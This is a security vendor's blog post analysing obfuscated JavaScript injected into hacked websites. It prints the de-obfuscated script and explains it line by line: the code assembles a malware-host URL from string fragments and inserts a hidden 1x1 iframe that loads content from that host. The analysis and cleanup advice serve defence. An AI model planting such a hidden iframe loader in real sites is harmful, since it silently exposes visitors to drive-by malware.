Monday, August 12, 2013

Analysis of the obfuscated malicious JavaScript

Obfuscated malicious JavaScript code creates iframe and injects into the website page

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This post describes the detected JavaScript as is and then shows how the malicious actions is created during the page rendering. You can try and locate such code on your website and do analysis and removal if required. This article should not be used as hacking guide.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Malware entry


Malware entry details.

Beautified script

When scanning the website with Quttera Website Malware Scanner you can see the Threat Dump field populated with the detected JavaScript code. De-obfuscation of one of such threat dump looks like this:

  1. wa = 't';
  2. = 'ht';
  3. = 'k98';
  4. tb = 'ame';
  5. bg = '.';
  6. = 'sr';
  7. = 'tp:';
  8. vf = '/z';
  9. bs = 't';
  10. px = 'v.h';
  11. br = 'yt';
  12. = 'c';
  13. yr = 'm';
  14. ds = 'm';
  15. ej = '/';
  16. au = '/';
  17. = 'com';
  18. sp = 'ifr';
  19. = 'ca';
  20. cp = 'y';
  21. wz = 'ir';
  22. wf = 'u';
  23. = '5';
  24. se = sp.concat(tb);
  25. oz = v.concat(k);
  26. /*
  27.  * set db to point to http: //zirycatum.com/k985ytv.htm
  28.  */
  29. db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
  30. var ip = document.createElement(se);
  31. ip.setAttribute('width', '1');
  32. ip.setAttribute('height', '1');
  33. ip.frameBorder = 0;
  34. ip.setAttribute(oz, db);
  35. document.body.appendChild(ip);



It did not take much effort to understand the result of code execution because except for few JavaScript methods the rest are simple value assignment to a variable.
Let's take a look at the interesting stuff:

 
  1. se = sp.concat(tb);

Here the JavaScript contact() method is applied to the sp and tb variables which simply creates a new string from 'ifr' and 'ame'. Hence se = 'iframe'


  1. oz = v.concat(k);

Same as in previous line while the v = 'sr' and k = 'c' which gives us oz='src'


  1. db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);

Again, just combining all the strings inside the variables in the parenthesis with the string inside p to get 
db = http: //zirycatum.com/k985ytv.htm


  1. var ip = document.createElement(se);

As we saw earlier, se = 'iframe' hence ip =document.createElement('iframe'); This is pretty self-explanatory.

Now let's make our iframe invisible or at least too small to be visually detected. This is done by the following lines:
 
  1. ip.setAttribute('width', '1');
  2. ip.setAttribute('height', '1');
  3. ip.frameBorder = 0;


To work properly we need to set the 'src' attribute to our document.createElement method.

  1. ip.setAttribute(oz, db);

Which is document.createElement('iframe').setAttribute('src', 'http: //zirycatum.com/k985ytv.htm'). Now we all set to inject our just created iframe into the rendered document:

  1. document.body.appendChild(ip);

Blacklisting status

Now let's see whether the redirection is really malicious? Let's check the domain in the Quttera scanner again.

Quttera website malware scanner
Quttera website malware scanner

Although, Quttera detects only single Potentially Suspicious file and no active malware at the time this article is being written, both Google and MalwareDomainList has already added this domain to their blacklists.

The website is Suspicious on Google Safe Browsing for hosting malware. As well it is listed in MalwareDomainList for redirecting to fake AV,

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.